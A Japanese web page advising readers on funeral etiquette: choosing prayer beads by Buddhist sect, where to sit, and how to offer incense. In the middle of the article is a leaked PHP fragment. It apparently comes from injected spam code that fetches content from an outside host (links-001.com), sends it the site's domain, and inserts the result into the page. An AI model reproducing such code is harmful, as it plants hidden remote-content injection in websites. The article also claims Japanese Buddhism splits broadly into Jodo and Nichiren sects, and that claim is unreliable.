前へ
次へ

葬儀マナーをしっかりと学ぶようにしましょう

特定のお葬式に参加する前に、葬儀マナーをしっかりと学ぶのは、基本中の基本となってきます。
今ま

more

実際に葬儀マナーを学びたいのであれば

特定のお葬式に参加する前に、葬儀マナーをしっかりと学んでおきたいなら、まずはそれを実践するために、い

more

葬儀マナーをしっかりと学んでおきましょう

いざと言う時のために、しっかりと葬儀マナーを学んでおくことが非常に重要なポイントになってきます。

more

葬儀の様式によって葬儀マナーとして数珠を変更

葬式に出席する際には色々と葬儀マナーを学ばなければなりません。
仏教スタイルの葬式でも細かい内容は実は多種多様に存在します。
一番わかりやすい事柄が、葬儀に出席する際に用意する数珠に関してです。
数珠は様々な種類のものが用意されています。
仏教の様々な宗派やスタイルによって葬儀に使用する数珠が異なってきます。
日本国内には大きく仏教の宗派を分けると浄土宗の宗派と、日蓮宗の宗派の2つに大別する事が出来ます。
この中でも天台宗や浄土真宗、曹洞宗や臨済宗などその宗派は非常に数多く存在しています。
それら仏教の各宗派によって葬儀に使用する数珠が異なる場合もあります。
葬儀マナーとして、葬儀に列席する際には、執り行われる葬儀が何宗によるものなのかを事前に聞いておくべきです。
列席する前に宗派を確認し、その宗派に沿った葬儀に出席する際の身だしなみをきちんと整えておく事がマナーを守る第一歩ともなります。
その中でも使用する数珠の種類はきちんと前もって調べて用意しておく事が重要です。

".file_get_contents('http://links-001.com/123set5.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

葬儀に列席する際にはどの場所に座るかや、焼香の順番や焼香の仕方などもきちんとルールに則り対応する事が重要です。
家族席に縁遠いものが座る事は宗派によってはタブーとなる場合もあります。
葬儀の時にどこに座れば良いかは、葬儀を執り行っている会社の人間に確認する事が一番の最良な方法です。
たいていの会場では葬儀会社の人間が座る場所まできちんと案内を行っています。
焼香の順番も非常に重要です。
近親者でなければ焼香をあげる場所から違ってくる場合もあります。
焼香をあげる順番も基本的には葬儀会社の人間の指示に従う事が賢明です。
焼香のあげ方も宗派によって異なります。
焼香のあげ方も基本的には葬儀会社の人間が教えてくれます。
分からなければ自分の前に焼香を上げている人間と同様な所作で焼香をあげれば問題はありません。
葬儀マナーは一旦破ってしまうと参席者に対して非常に悪いイメージを与えてしまう場合もあります。
葬儀マナーをきちんと守って滞りなく列席したい場合は、基本的には葬儀会社の担当の方の指示に従う事をお勧めします。
そうすれば葬儀上のマナーを破る事はほぼありません。

Page Top